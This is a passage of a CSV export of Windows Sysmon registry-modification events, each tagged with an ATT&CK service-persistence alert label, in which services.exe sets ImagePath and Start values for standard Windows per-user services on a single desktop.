10:15:48.700",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.275736200Z"",""eventRecordID"":""834"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:15:48.695",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.275296400Z"",""eventRecordID"":""833"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.675",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.273284100Z"",""eventRecordID"":""832"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 26, 2020 @ 10:15:48.647",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.272778300Z"",""eventRecordID"":""831"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.617",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.271093200Z"",""eventRecordID"":""830"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 26, 2020 @ 10:15:48.597",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.270828700Z"",""eventRecordID"":""829"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.584",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.269494500Z"",""eventRecordID"":""828"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow -p""" +"Apr 26, 2020 @ 10:15:48.502",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.269091500Z"",""eventRecordID"":""827"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.488",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.262748800Z"",""eventRecordID"":""826"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\CredentialEnrollmentManager.exe\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\CredentialEnrollmentManager.exe""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3ddcb\ImagePath +Details: C:\Windows\system32\CredentialEnrollmentManager.exe""" +"Apr 26, 2020 @ 10:15:48.448",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.259176000Z"",""eventRecordID"":""825"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.417",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.255564900Z"",""eventRecordID"":""824"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 26, 2020 @ 10:15:48.401",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.255194500Z"",""eventRecordID"":""823"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.357",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.253478000Z"",""eventRecordID"":""822"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:15:48.332",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.253039000Z"",""eventRecordID"":""821"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_3ddcb\Start +Details: DWORD (0x00000002)""" +"Apr 26, 2020 @ 10:15:48.321",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.251049100Z"",""eventRecordID"":""820"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.217"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k ClipboardSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.217 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p""" +"Apr 26, 2020 @ 10:15:48.293",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.250328100Z"",""eventRecordID"":""819"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 